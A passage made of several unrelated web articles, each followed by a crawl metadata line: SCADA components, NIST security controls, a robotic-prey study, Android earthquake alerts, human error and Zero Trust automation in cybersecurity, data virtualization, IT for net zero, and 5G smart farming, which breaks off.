For example, if the SCADA system detects an anomaly or a need to make an adjustment, it sends signals to the PLC that trigger relevant actuators to make the necessary changes.
- Communication Networks: Networks connect the sensors, RTUs, PLCs, and the central control system. These networks allow for remote monitoring and a seamless flow of data between field devices and the SCADA system, enabling real-time monitoring, control, and automation of industrial processes. In other words, communication networks facilitate data collection, transmission, processing and display, control commands, and action implementation.
- Human-Machine Interfaces (HMIs): These are the user interfaces or dashboards that enable personnel to interact with a machine, system, or device, with data visualization and trend analysis of the various monitored and controlled processes. HMIs also provide real-time visual or audible notifications when process parameters deviate from the predefined acceptable range.
Automated reports on system performance can be generated by HMIs, either on a schedule or triggered by defined events.
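The temperature example above can be sketched as one pass of a sensor-to-actuator control loop. This is a toy illustration, not any vendor's API: the threshold, the `CoolingActuator` class, and the status strings are hypothetical.

```python
HIGH_TEMP_C = 75.0  # hypothetical alarm threshold

class CoolingActuator:
    """Stand-in for a PLC output channel driving a cooling system."""
    def __init__(self):
        self.running = False
    def start(self):
        self.running = True
    def stop(self):
        self.running = False

def control_step(temperature_c, actuator, threshold=HIGH_TEMP_C):
    """One pass of the loop: read a sensor value, decide, act.
    Returns the status string an HMI dashboard might display."""
    if temperature_c > threshold:
        actuator.start()  # SCADA -> PLC -> actuator
        return "ALARM: high temperature"
    actuator.stop()
    return "normal"

cooler = CoolingActuator()
for reading in [68.2, 71.5, 80.3]:  # simulated RTU readings
    status = control_step(reading, cooler)
    print(f"{reading:.1f} C -> {status} (cooling on: {cooler.running})")
```

A production SCADA loop adds deadbands, alarm acknowledgment, and failsafe states, but the core pattern of measure, compare, and actuate is the same.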
The National Institute of Standards and Technology (NIST) has released its final report on cybersecurity recommendations for the federal government.
NIST teamed up with DoD and other agencies in the Intelligence Community (IC) to find common security solutions for agencies and contractors.
While conducting their work, officials identified solutions for securing cyber networks, but also examined new threats related to IT — and the country’s overall infrastructure — that didn’t exist years ago.
Ron Ross, who is with NIST’s computer security division and worked on the project, explained more during Thursday’s Daily Debrief.
“We call this document an historic document in the sense that we’ve been working for the last couple of years with our counterparts over in the Intelligence Community, through the Office of the Director of National Intelligence and the Defense Department, to try to look at the various sets of security controls that were being used by the three communities of interest, to include the civil side that NIST represents. It turns out that, for the vast majority of controls that were used in all three communities, we had a lot of overlap. There was a lot of commonality amongst what we were doing.”
Ross said this realization enabled the researchers to develop a catalogue based on a foundation created by NIST. Those on the project added controls specific to the IC and DoD.
NIST does not mandate the additional controls for national security; rather, Ross said, the specific controls are in the catalogue and can be used by any community that wants additional security.
“In the [IC] and [DoD], the committee on National Security Systems (CNSS) is working on a companion publication that will point to the control catalogue . . . and then [any community] can pick whatever controls they want out of the catalogue they feel are appropriate, and mandate those controls for their particular communities of interest. So it’s really the best of all worlds.”
Ross said NIST, the IC and DoD all take advantage of each other in order to make sure the best controls are developed for a world-wide customer base.
“The vast majority of the controls, whether they’re management, operational or technical in nature, are common to the entire federal community. Where we tend to diverge would be in the cryptography areas. The national security systems may require a stronger grade or higher cryptography. The personnel security in the DoD and [IC] tend to have higher security clearances . . . and the physical security tends to be a little bit stronger around those facilities that have national security systems. But, if you take out those three areas, almost everything else we have pretty much in common with the other communities.”
Ross said, overall, this most recent document doesn’t contain many surprises, though new challenges appeared when compared to years ago.
In addition, many security fundamentals are reiterated, though they have been updated for today’s modern, more complex systems.
“Literally we have millions of lines of code in the operating systems, the middleware, the applications — all riding on a bed of integrated circuits. It’s an extremely complicated undertaking. It’s always very difficult to figure out where to apply the appropriate security controls, the number of controls, the rigor, the assurance level of those controls, how good those controls are — [it is] very difficult in an environment where you have this type of complexity. Also, everything is connected to everything else today.”
That environment of connectivity, whether it be between agencies, agencies and state and local governments, or agencies and the private sector, presents its own set of challenges, as well.
“There were no real surprises. The attacks continue to get better and better. You can download very sophisticated attack tools from the Internet now and you can launch those attacks with very low cost laptop computers. So, the attack potential is there and there’s lots of smart people out there who are continuing to try and figure out how to break into the systems. Our job on the defensive side is to try and anticipate those types of attacks and close them down as soon as we can.”
Ross added that another, more intangible challenge was identified.
“Our increasing dependence on information technology. . . . This dependence on the technology and the ability of adversaries to attack specific places in the system give us great concern — especially in things like critical infrastructure, where you have electric power grids, water distribution systems, first responders that are depending on this technology for their mission and business success. We worry not only about the attacks bringing down significant portions of the infrastructure, we also worry about the opposite extreme — where the adversaries will implant malicious code into the systems, fully intending to keep those systems operational, but exfiltrating critical data out the back end.”
The recent cybersecurity document is only one of several that NIST is working on. | <urn:uuid:19ddd56c-83c6-4338-8bc3-ca5894e6dc7b> | CC-MAIN-2024-38 | https://federalnewsnetwork.com/defense/2009/08/nist-releases-final-cybersecurity-recommendations/ | 2024-09-08T05:41:18Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00692.warc.gz | en | 0.961701 | 1,017 | 2.515625 | 3 |
Researchers Use Robotic Prey to Track Predator Behavior
The findings help to better inform our understanding of predator behavior
A new study from the University of Bristol used robots to investigate how predators react to unpredictable movements from prey – testing a long-held theory that erratic movements can help animals escape an aggressor.
The team from Bristol’s School of Biological Sciences studied how blue acara cichlids responded to robotic prey that was programmed to move in certain patterns to escape, while monitoring the predators’ reaction to random versus predictable movements.
“Using robotic prey allowed us to present individual predators with one of two prey escape strategies: ‘predictable’ prey which repeatedly escaped in the same direction from one interaction with the predator to the next, or ‘unpredictable’ prey which escaped in random directions,” said lead author Dr Andrew Szopa-Comley.
The results disproved the theory, instead demonstrating how predators can adapt their movements to neutralize their prey's random pathways, accelerating in the later stages of the hunt to compensate for time lost in assessing the bot's movements.
“Our results suggest that the predators in our study were able to overcome the potential downsides of facing prey which behave unpredictably,” said senior author Dr. Christos Ioannou. “From the prey’s point of view, this raises the question of whether unpredictable behavior is as widely beneficial as was originally thought.”
Results from the study were published in June in the science journal PNAS.
Google is shaking things up: Android expands earthquake alerts to all U.S. states
Android users across the United States now have access to early earthquake warnings, as the Android Earthquake Alerts System expands to cover all 50 states and six U.S. territories. This system, which has been instrumental in providing life-saving alerts in California, Oregon, and Washington, is being rolled out nationwide, with the deployment set to be completed in the coming weeks. This expansion ensures that millions more people are prepared when an earthquake strikes.
Since its launch in 2020, the Android Earthquake Alerts System has relied on partnerships with the United States Geological Survey (USGS), California Governor's Office of Emergency Services (CalOES), and the ShakeAlert system to deliver accurate and timely alerts based on data from traditional seismometers. To extend these early warnings to areas without the USGS ShakeAlert system, Android phones themselves have been turned into mini seismometers.
Using the built-in accelerometers in Android devices, the system detects vibrations that may indicate an earthquake. When multiple phones in an area detect similar shaking, the system analyzes this crowdsourced data to determine whether an earthquake is occurring.
If the shaking is determined to be from an earthquake, the system sends out one of two alerts based on the magnitude: a "Be Aware" alert for weak or light shaking, or a "Take Action" alert for moderate to extreme shaking, prompting immediate action to protect oneself. In addition to these alerts, users can find real-time earthquake information by searching "Earthquake near me" on Google.
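The crowdsourced check and the two alert tiers described above can be sketched as a pair of small functions. The quorum size and intensity categories below are illustrative placeholders, not Google's actual thresholds:

```python
WEAK_OR_LIGHT = {"weak", "light"}
MODERATE_OR_ABOVE = {"moderate", "strong", "severe", "extreme"}

def quorum_detected(reports, min_phones=5):
    """Crowdsourced check: treat the event as a quake only when enough
    nearby phones report similar shaking (quorum size is illustrative)."""
    return len(reports) >= min_phones

def alert_for(shaking):
    """Map estimated local shaking to one of the two alert tiers."""
    if shaking in WEAK_OR_LIGHT:
        return "Be Aware"
    if shaking in MODERATE_OR_ABOVE:
        return "Take Action"
    return None  # too weak to alert
```

The real system fuses accelerometer traces, location, and seismometer data before alerting, but the shape of the decision — confirm by quorum, then grade the alert by expected shaking — is the same.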
The Android Earthquake Alerts System is continuously being refined through collaboration with experts like Dr. Lucy Jones and Dr. Jeannette Sutton, as well as organizations like the Global Disaster Preparedness Center (GDPC). By working closely with these experts and analyzing data from seismic events, Google aims to enhance the accuracy and effectiveness of its earthquake alerts. | <urn:uuid:5f46ceb8-0af4-49aa-ace8-4336cf60b720> | CC-MAIN-2024-38 | https://betanews.com/2024/09/03/google-android-earthquake/ | 2024-09-11T22:14:35Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00392.warc.gz | en | 0.931967 | 391 | 2.578125 | 3 |
- Human mistakes continue to be the root cause of data breaches. Habit, bias, and the status quo interfere with our ability to realistically assess cybersecurity risks.
- The U.S. government is escalating efforts to address both workforce shortages and sophisticated cyberthreats by spearheading organizational change that prioritizes collaboration, inclusion, transparency, and crowdsourcing of innovation.
- With exponentially increasing data and a shift to Zero Trust, automation is a necessity to reduce human stress and mistakes from data overload, while also improving decision-making and increasing job satisfaction.
The recent hacking of Uber by a teenager, reported to be affiliated with the notorious Lapsus$ teen hacker gang, demonstrates once again how a single employee’s distracted decision, when targeted by a psychological attack, is a major risk factor. The hacker broke in by compromising a contractor’s multifactor authentication (MFA), using MFA bombing to fatigue the contractor until they approved the request. Breaches exploiting weak security tools and social engineering continually play out in the news, spawned by nation-state threat actors, ransomware gangs, and teen hackers like Lapsus$.
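One common defense against this kind of MFA fatigue is to throttle repeated push prompts and flag bursts for review. The sketch below is a generic rate limiter, not a description of any vendor's product; the limit and window values are arbitrary illustrative choices:

```python
import time
from collections import deque

class PushThrottle:
    """Reject MFA push requests that arrive faster than
    `limit` per `window` seconds for a single user."""
    def __init__(self, limit=3, window=300):
        self.limit = limit
        self.window = window
        self.times = deque()  # timestamps of recent allowed prompts

    def allow(self, now=None):
        now = time.monotonic() if now is None else now
        # Drop requests that have aged out of the sliding window.
        while self.times and now - self.times[0] > self.window:
            self.times.popleft()
        if len(self.times) >= self.limit:
            return False  # burst detected: suppress the prompt, alert security
        self.times.append(now)
        return True
```

Suppressing the fourth prompt inside a five-minute window removes the "tap approve to make it stop" pressure that MFA bombing relies on; number-matching prompts close the same gap from the user's side.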
Psychologists ask their patients to look beyond external negative symptoms and become aware of internal root causes. This process uncovers fixed and inaccurate mental rules (biases) that are being relied on that can lead to detrimental outcomes. However, complacency can be changed through communication, education, and awareness – from the leadership level all the way down to the user level.
Human mistakes are a major cause of data breaches. Yet many organizations continue to assume (despite evidence to the contrary) that staff:
- are well-educated about cyber risks
- know how to prioritize cybersecurity alongside completing job tasks
- feel their efforts are valued and can safely give feedback
- optimize security tools that may not be user-friendly, even when distracted by people and daily tasks
Human decisions are often made quickly based on habits and bias from past experiences due to pressures from:
- social conformity (two-way feedback is not encouraged)
- social norms and time constraints (get your job done)
- apathy over the status quo (we’re stuck using tools and processes that don’t work well)
- “accepted wisdom” (such as the belief that multifactor authentication alone is secure and prevents breaches)
Unless leadership takes an honest look at the internal rules, tools, and policies that create apathy, confusion, stress, and mistakes, employees will continue to default to habit in order to get their job done. Enterprise cybersecurity risk is a different animal than other kinds of risks. For example, weather can be a risk but it doesn’t psychologically target your staff with persistence and ever-evolving sophisticated tactics.
How do you increase adaptation and compliance, dispel complacency, and support user-friendly Zero Trust policies and tools that actually engage and empower employees, rather than relying on punitive, aggravating measures?
Cognitive bias, power hierarchies, and lack of clear communication, collaboration, and feedback are underlying root causes of human mistakes that create serious cybersecurity risks. Check out our recent articles on the important topics of cyber resilience, human bias, collaboration, and innovation:
- Cyber resilience requires managing human risks and leveraging innovation and automation
- Three ways to reduce cybersecurity risk: bias education, collaboration, and intelligent automation
When it comes to change, leadership must set the example, promote honest feedback, and be accessible. Teri Green, a former CISSP Chief Information Officer at Normandy Schools Collaborative and founder of her own cybersecurity firm, said that to help her team cope with difficulties she began leading daily mindfulness sessions, according to the article “Using Mindfulness and Authenticity to Lead Tech Teams.“
Green said she believes we have to push ourselves and, “I’m a firm believer that life begins at the end of your comfort zone.” She emphasized:
“When considering how people decide to do one thing or another, it all comes down to seeing and believing. When leaders show up, they need to show up as the individual they wish to see.”
If cybersecurity is a top concern of your organization, then your employees must see it and feel it by the inclusive actions of your leadership. These actions may include cross-departmental collaborations and feedback, funding user-friendly automation that reduces tedious work, stress, and mistakes, or by making cyber awareness an ongoing and meaningful part of your culture and personally relevant in daily decision-making.
For example, Washington, D.C.-based Children’s National Hospital implemented a code that signals staff to unplug or turn off internet-connected devices to mitigate cyberattacks. Nurses, physicians, and staff members are educated and empowered to look for suspicious activity on technology devices and then report it to the hospital security staff, who would would then send the “code dark” signal to all staff. All hospital staff members carry cards with “code dark” steps on lanyards.
A National Need to Change Organizational Dynamics
The serious nature of cyberthreats has brought our nation to the point of recognizing there have been systemic and mental biases hindering information and idea flow between individuals, organizations, and hierarchies.
The newly released Cybersecurity and Infrastructure Security Agency’s (CISA) 2023-2025 Strategic Plan is working to break down barriers and hierarchies in order to promote a new model for innovative collaborations. A few of the stated key areas of focus include:
- “CISA must lean forward in our cyber defense mission toward collaborative, proactive risk reduction. Working with our many partners, it is CISA’s responsibility to help mitigate the most significant cyber risks to the country’s National Critical Functions, both as these risks emerge and before a major incident occurs.
- We will strengthen whole-of-nation operational collaboration and information sharing. At the heart of CISA’s mission is partnership and collaboration … We will succeed because of our people. We are building a culture of excellence based on core values and core principles that prize teamwork and collaboration, innovation and inclusion, ownership and empowerment, and transparency and trust.”
The White House also released the Strategic Intent Statement for the Office of the National Cyber Director (ONCD), focusing on collaboration and innovation between the public and private sector, which states:
- “Individual cyber hygiene is important and personally laudable, but systemically inadequate … [The ONCD] will improve public-private collaboration to tackle cyber challenges across sectoral lines. It will align resources to aspirations by ensuring U.S. departments and agencies are resourcing and accounting for the execution of cyber initiatives, assets, and talent entrusted to their care, and considering all possible future such requirements …
- We must “crowdsource” our ability to identify and stop transgressors in much the same way they crowdsource their exploitation of us.”
Key phrases from the two plans above are “innovation and inclusion, ownership and empowerment” and “crowdsource” for innovation. For too long there has been implicit bias around a belief that good ideas come from having the “right” educational background, experience, or titles. Now with the Great Resignation, looking outside normal hiring channels is critical to fill the cybersecurity workforce shortage.
Young hackers have become a force to be reckoned with and it’s worth considering how their abilities can be proactively mentored and validated in positive ways. The Lapsus$ teen gang has been behind many major breaches like Uber. On the flipside, former teen hacker Marcus Hutchins turned from the dark side to become a Jedi-like white hat hacker and personally stopped the 2017 global WannaCry ransomware attack in just hours.
Maybe we need people like Marcus Hutchins performing outreach on the dark web to help lead misguided, attention-seeking hackers into the light (hackers and their families need critical infrastructure like utilities, water, and hospitals too). It’s time we consider new ways to crowdsource talent and innovation by looking beyond college graduates, long resumes, and organizational hierarchy. Our world may depend on it.
Breaking through barriers means you approach problems with curiosity and a willingness to experiment and do things different – just as athlete and student Roger Bannister did in 1954 when he broke the four-minute mile when people thought it was impossible. Bannister researched the mechanics of running and trained using new scientific methods he developed. He went on to become a neurologist.
Removing organizational barriers to positive change must include reducing rigid mental bias, information blindness, and inertia that lead to poor decisions. Collaboration and crowdsourcing can help to identify innovative tools and policies needed to improve cybersecurity.
The Importance of Human-in-the-Loop Automation
With growing masses of data being generated in the world today and staffing shortages, solutions that use automation are necessary to implement Zero Trust. Automation will help identify and properly process and protect essential data. Automating tedious tasks reduces human mistakes from data overload, and can also increase job satisfaction with humans focused on higher-level strategic and creative tasks.
In reality, “human-in-the-loop” automation has existed for thousands of years. The first water wheels for crop irrigation, grinding grains, and supplying village water date back to ancient Rome. Today, washing machines, lawn mowers, cars, and indoor plumbing all help automate daily tasks for humans.
A current big area of development in data and process automation is artificial intelligence (AI) and machine learning (ML). However, understanding its benefits and risks can be confusing because those are blanket terms describing a number of different, developing technologies that have cybersecurity applications. It is important that as a nation we define beneficial use cases of AI/ML automation while also clearly delineating where AI could become a cyber risk itself.
Regarding risks, there are concerns over how some forms of AI are being ethically developed and how cyber attackers are using it. These are valid concerns because individual humans program AI. Each of us has our own values, and other nations or cybercriminals also have their own value systems. All of these value systems are very diverse and contain much bias.
No one has conclusively described cognition. Researchers and psychologists continue to broaden cognition to expanded ideas around identity and how we make decisions. Some of these research areas include quantum cognition and embodied cognition. If we don’t fully understand how our own minds, bodies, intuition, and feelings work together, a human-programmed AI may not behave in the way we expect.
In fact, the National Institute of Standards and Technology (NIST) has created several discussion documents and has been asking for feedback on AI risks, specifically to examine the often hidden risks of human and systemic biases that could be programmed into AI.
Check out the important document, NIST Special Publication 1270 – Towards a Standard for Identifying and Managing Bias in Artificial Intelligence, which shows an iceberg representing below-the-waterline, Titanic-style human and systemic bias that is overlooked.
Autonomous AI that is programmed to take action for us is a cyber risk, conjuring up ideas of movies like The Terminator or The Matrix. An AI programmed to be efficient might not be counterbalanced with human traits that know efficiency is not the correct path in every situation. In fact, the article “Will Artificial Intelligence make humanity irrelevant?” outlines why AI can’t, and should not, take the place of human oversight and decision-making.
It is of vital importance that humans remain “in-the-loop” and not release AI on its own recognizance. We should be concerned if any nation or threat actor is planning on releasing some type of autonomous AI onto connected networks that could spread like a digital pandemic.
The AI described above is different from intelligent automation technologies that are available now that have important benefits, including human-controlled data and process automation technology. Just like how washing machines and modern plumbing automate laborious tasks, AI/ML data processing automation (with a human-in-the-loop) can be very helpful in reducing tedious tasks to free up human time to focus on the big picture and creatively solve problems.
AI/ML data discovery and classification and intelligent document processing allow security and data management staff to index petabytes of unstructured and structured data in order to identify, assess, tag, workflow, and correct risks in your data estate. Some security technologies also use AI to remove false positives and provide more accurate modeling. All of these technologies are of real value to automate monotonous, mistake-prone data tasks and allow humans-in-the-loop to make faster and more informed real-time decisions.
Two recent reports were developed on how to implement Zero Trust and both identify challenges that illustrate the usefulness of automation for data visibility, inventory, and management.
The first is the Draft Report on Zero Trust and Trusted Identity Management from the President’s National Security Telecommunications Advisory Committee. John Kindervag, who helped define Zero Trust while at Forrester Research, was among industry leaders who wrote the report as part of the committee.
According to this report:
“some federal agencies (and many private sector organizations) lack basic visibility of the data, assets, applications, and services in their organization, and as a result, are not yet ready to begin their Zero Trust journey”
The World Economic Forum created a community white paper, “The ‘Zero Trust’ Model in Cybersecurity: Towards Understanding and Deployment“ that aims to demystify zero trust. One challenge it points out is:
“[Zero Trust] requires organizations to have a detailed inventory of applications, data assets, devices, networks, access rights, users and other resources.
The paper goes on to say, “However, in order to know what to verify, cyber leaders need to clearly identify what the “crown jewels” are that they need to protect. To that end, an essential part of the shift to Zero Trust is understanding and mapping the valuable critical data, assets, devices (such as laptops, smartphones and IoT devices) and other resources.”
Identifying and understanding all your data assets is a foundational step in ensuring that they are both protected and that staff are using quality data sources – “true data” – when making important decisions. Recent Forrester research also found that not doing sufficient data discovery and classification caused Zero Trust microsegmentation project failures.
A healthy organization should be using data discovery and classification to perform a baseline inventory and assessment of data assets to identify and remove hidden risks to essential data used for decision-making. It’s also critical that after baseline you continuously monitor the data estate for changes that might affect data safety or usability.
Understanding what’s in your data estate, identifying past data-handling mistakes, reducing PII and business intelligence risks, and organizing data for quality analytics will help your organization make more informed data-based decisions going forward that support future growth.
Do you know what and where all your data is? Can you monitor changes to your data estate? Is there unencrypted business intelligence or PII data that should be protected? Do you have legacy and over-retained data that should be moved or deleted? Are analytics solutions incorporating all important data?
Comprehensive AI/ML data discovery and classification and intelligent document processing enable safer digital transformation by indexing all unstructured and structured data living in your data stores. Manage your data estate with tagging, filters, and federated search to correct mistakes and misfiled data, protect any exposed business intelligence or PII, and empower your data analytics solutions. Keep it that way going forward with ongoing, automated monitoring.
This article is an updated version of a story that appeared in Anacomp’s weekly Cybersecurity & Zero Trust Newsletter. Subscribe today to stay on top of all the latest industry news including cyberthreats and breaches, security stories and statistics, data privacy and compliance regulation, Zero Trust best practices, and insights from cyber expert and Anacomp Advisory Board member Chuck Brooks.
Anacomp has served the U.S. government, military, and Fortune 500 companies with data visibility, digital transformation, and OCR intelligent document processing projects for over 50 years. | <urn:uuid:d5d00c63-d541-4421-8b11-e9d20ec820c6> | CC-MAIN-2024-38 | https://dev.anacomp.com/the-root-causes-of-cybersecurity-risk-and-how-automation-can-help/ | 2024-09-11T23:21:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00392.warc.gz | en | 0.932206 | 3,365 | 2.53125 | 3 |
While Big Data Analytics has become all the rage over the past few years, another technology also has entered the mainstream: Data Virtualization.
Data Virtualization is the process of abstracting different data sources through a single data access layer which delivers integrated information as data services to users and applications in real-time or near real-time. Stated in terms that IT leaders and integration architects can use with their business colleagues, data virtualization ensures that data is well integrated with other systems so that enterprises can harness big data for analytics and operations.
Today, data virtualization tools have become mature enough so that corporations are adopting them to lower the costs of traditional integration (through writing custom code, ETL, and data replication processes). The tools also allow for increased flexibility for data warehouse prototyping or extensions. Because data virtualization exposes complex big data results as easy-to-access REST (representational state transfer) data services, data virtualization tools make it possible to integrate data between enterprise and cloud applications.
The technology also simplifies data access in three steps: by connecting and abstracting sources, combining them into canonical business views, and lastly publishing them as data services. In this way it is similar to server, storage, and network virtualization in that it simplifies the appearance of what is being managed for users while under the covers it employs technologies for abstraction, decoupling, performance optimization, and the efficient use (or re-use) of scalable resources.
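As a rough illustration of those three steps, here is a minimal, hypothetical sketch in Python; the source names, schemas, and the lookup standing in for a published REST data service are all invented for the example, not taken from any particular data virtualization product:

```python
# Conceptual sketch of data virtualization's three steps:
# 1) connect and abstract sources, 2) combine them into a canonical
# business view, 3) publish the view as a data service.

def connect_sources():
    # Step 1: abstract two heterogeneous sources behind a common shape.
    crm = [{"customer_id": 1, "name": "Acme"}]        # e.g. a CRM table
    orders = [{"customer_id": 1, "total": 250.0}]     # e.g. a warehouse extract
    return crm, orders

def canonical_customer_view(crm, orders):
    # Step 2: join the sources into one canonical business view.
    totals = {}
    for o in orders:
        totals[o["customer_id"]] = totals.get(o["customer_id"], 0) + o["total"]
    return [
        {"customer": c["name"], "lifetime_total": totals.get(c["customer_id"], 0)}
        for c in crm
    ]

def publish_as_service(view, customer):
    # Step 3: expose the view as a simple lookup, standing in for a REST endpoint.
    for row in view:
        if row["customer"] == customer:
            return row
    return None

crm, orders = connect_sources()
view = canonical_customer_view(crm, orders)
print(publish_as_service(view, "Acme"))  # {'customer': 'Acme', 'lifetime_total': 250.0}
```

A real platform would do all of this declaratively rather than in hand-written code; the point is only that consumers see one clean view while the joins and source plumbing stay hidden underneath.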
Unlike hardware virtualization, data virtualization deals with information and its semantics – any data, anywhere, any type – which can have a more direct impact on business value.
With enterprise analytics, you need both big data and access to that data to create real value. Big data involves distributed computing across standard hardware clusters or cloud resources, using open source technologies such as Hadoop alongside cloud services like Amazon S3 and Google BigQuery. Data virtualization can be part of this picture, too. In its report, “Data Virtualization Reaches Critical Mass,” Forrester Research says, “Integration of big data expands the potential for business insight” and cites this potential as a driver for data virtualization adoption.
Data virtualization can help organizations to extract value from large data volumes efficiently, and perform intelligent caching while minimizing needless replication. It has also enabled companies to access many data source types by integrating them with traditional relational databases, multi-dimensional data warehouses and flat files so that BI users can conduct queries against the combined data sets. For example, a leading crop insurer has used data virtualization to expose its big data sources and integrate them with its transactional, CRM and ERP systems to deliver an integrated view of sales, forecasts and agent data to its sales team. Using data virtualization, these complex reports could be developed much faster, using fewer staff resources than in the past.
Data virtualization represents a straightforward way to deal with the complexity, heterogeneity and volume of information coming at us, while meeting the needs of the business community for agility and near real-time information. IT will need to adapt to this reality or become less relevant as business owners increasingly drive technology decisions.
Go to source at Data Informed
How IT can help tech companies to reach Net Zero
19 Sep, 2023 · 3 min read
Since the Paris Agreement was signed in 2015, achieving ‘net zero’ has become a globally recognised goal. The Agreement underlines the need for net zero and requires states to ‘achieve a balance between anthropogenic emissions by sources and removals by sinks of greenhouse gases in the second half of this century’. In basic terms, this means achieving a balance between the carbon emitted into the atmosphere, and the carbon removed from it.
When it comes to CO2 emissions, this is the state at which global warming stops.
The UK Government has since set out its own Net Zero Strategy, which outlines a roadmap for how the country will unlock £90 billion in investment to reach net zero emissions by 2050.
To reach net zero, emissions from areas such as homes, transport, and agriculture will need to be cut, and sectors will have to reduce the amount of carbon they put into the atmosphere. For industries which rely on a high carbon output to stay afloat, this goal means drastically changing how their sectors operate.
The tech sector, in particular, faces unique challenges in reaching net zero emissions, such as the exponential growth in demand for data services, difficult-to-mitigate production methods, and huge supply chains, all of which contribute to a high carbon output. However, many companies within the sector have chosen to make their own environmental commitments – setting deadlines, writing pledges into policy and streamlining their major emitters.
Cisco is one of them. In 2021, the company made a commitment to reach net zero across all scopes of emissions by 2040, which includes product use, operations, and supply chains.
Its plan involves:
- Continuing to increase the energy efficiency of products and solutions.
- Further embedding circular economy principles across the business.
- Accelerating the use of renewable energy.
- Embracing hybrid work.
- Investing in innovative carbon removal solutions.
What role does IT play?
Powering the internet uses swathes of electricity, largely via the use of data centres. On average, servers and cooling systems account for the greatest share of direct electricity use in data centres, followed by storage drives and network devices. Some of the world’s largest data centres each contain tens of thousands of IT devices and require more than 100 megawatts (MW) of power capacity – enough to power around 80,000 U.S. households.
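As a quick sanity check on that figure, 100 MW spread evenly across 80,000 households works out to about 1.25 kW each, which is in line with average U.S. household electricity demand:

```python
# 100 MW of data centre power capacity vs. ~80,000 U.S. households
capacity_watts = 100e6
households = 80_000
avg_watts_per_household = capacity_watts / households
print(avg_watts_per_household)  # 1250.0 watts, i.e. 1.25 kW per household
```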
The rapid growth in internet traffic and global internet users has raised concerns that the increase in energy usage of data centres could have negative impacts on the climate, with some media headlines warning that a “‘Tsunami of data’ could consume one fifth of global electricity by 2025”.
However, despite the rapid growth in demand for information and data centre services over the past decade, net energy usage has remained surprisingly flat at 1-2 per cent of global electricity usage. This is likely due to exponential increases in computational energy efficiency and new developments in technology.
For example, the ability to run multiple applications on a single server has significantly reduced the energy intensity of each hosted application, and the shift to larger and more efficient cloud and hyperscale data centres has allowed for the use of ultra-effective cooling systems which reduce energy consumption.
The reduction of other emissions
The potential that IT presents for reducing other kinds of emissions should not be forgotten. By optimising IT, companies can reduce their energy usage, cut costs, and improve their operational efficiency.
When companies utilise cloud-based servers and platforms, for example, they can reduce the need for physical paperwork. And because these systems can be accessed from any location, employees can work remotely, reducing the emissions caused by commuting.
We’ve previously explored how smart technology can be used to reduce household energy usage by harnessing sensors which monitor electricity use, can remotely switch equipment off, and identify areas where consumption can be reduced. The same principle applies to major corporate companies and production lines, where sensors can be used to identify and measure which networking and non-IT equipment is consuming high volumes of power.
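A minimal sketch of that idea is shown below; the device names, sample readings, and 500 W threshold are illustrative assumptions, not values from the article:

```python
# Flag equipment whose average measured draw exceeds a threshold,
# as a smart-metering sensor platform might.
def high_consumers(readings_watts, threshold=500.0):
    flagged = []
    for device, samples in readings_watts.items():
        avg = sum(samples) / len(samples)
        if avg > threshold:
            flagged.append((device, avg))
    # Worst offenders first, so attention goes where savings are largest.
    return sorted(flagged, key=lambda item: -item[1])

readings = {
    "office-hvac": [1200.0, 1350.0, 1100.0],
    "idle-printer": [40.0, 42.0, 39.0],
    "server-rack-3": [900.0, 950.0, 910.0],
}
print(high_consumers(readings))
```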
On the global stage...
The Internet of Things (IoT) allows these connected devices to ‘talk’ to one another, communicating huge volumes of data in seconds. As increasing amounts of useful energy data is collected, more connections can be made and correlations gleaned. By gathering industry-specific information, there is a better chance of building a more complete picture on global energy usage and, more importantly, identifying areas for improvement.
By harnessing new technology and prioritising innovation within the IT industry, the overall impact of IT and data centres on the climate will continue to shrink, offering a significant contribution to the net zero goals of the tech sector and the UK government.
Back down to earth
However, not all companies will have the resources or in-house know-how to utilise IT to make themselves more energy efficient. Which is why having the best talent to help drive and implement this change is so crucial. For businesses to make progress in this area they will need innovative, forward thinkers with technical expertise. Sound like you? Get in touch with the team today. | <urn:uuid:ca99b1b7-f16f-4dc1-bdee-8a2b391930da> | CC-MAIN-2024-38 | https://www.hamilton-barnes.com/resources/blog/how-it-can-help-tech-companies-to-reach-net-zero/ | 2024-09-13T05:00:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00292.warc.gz | en | 0.942545 | 1,097 | 2.9375 | 3 |
In the ongoing quest to develop cheaper, more effective means of agriculture, about three significant revolutions have taken place so far.
The first major revolution was the transition from hunting and gathering to farming. The second coincided with the industrial revolution, improving farmers’ ability to bring their goods to market. Hybridization and genetic engineering marked the third revolution with the increased use of chemical pesticides and fertilizers.
The fourth revolution, known as smart farming, is still in its early stages. Drawing on connected devices throughout the food supply chain, smart farming promises greater speed, safety, and dependability using technologies like drones and AI. Powering this innovation are faster 5G networks, with tremendous opportunity for improved tracking, sustainability, and more efficient resource deployment at scale.
Improved Food Tracing and Logistics
Farmers have long looked for more efficient ways to bring their goods to market. Many already use technologies like GPS and Enterprise Resource Planning (ERP) to track, transmit and analyze product data in real time. 5G-connected IoT devices represent the next step in this evolution, offering lower latency and faster speeds for transmitting conditions, temperature, safety, humidity level, and other factors. That is a huge safety improvement to the food supply chain. Widespread use of 5G-connected devices opens the door to better product tracing for recalls, for example, with detailed visibility into storage facilities, delivery vehicles and processing plants. Additionally, potentially contaminated produce may be confined to a single acre or row, supporting the FDA's Food Safety Modernization Act in the United States (FSMA) and similar regulations in the European Union.
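To illustrate how per-plot sensor data can confine a recall, here is a hedged sketch; the field layout and the boolean contamination flag are invented for the example:

```python
# Given sensor readings tagged with (acre, row), confine a recall
# to only the plots where a contamination indicator was detected.
def recall_scope(readings):
    affected = set()
    for reading in readings:
        if reading["contaminated"]:
            affected.add((reading["acre"], reading["row"]))
    return sorted(affected)

readings = [
    {"acre": 1, "row": 4, "contaminated": False},
    {"acre": 1, "row": 5, "contaminated": True},
    {"acre": 2, "row": 1, "contaminated": False},
]
print(recall_scope(readings))  # [(1, 5)] -- one row is recalled, not the whole farm
```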
Greater Efficiency and Sustainability
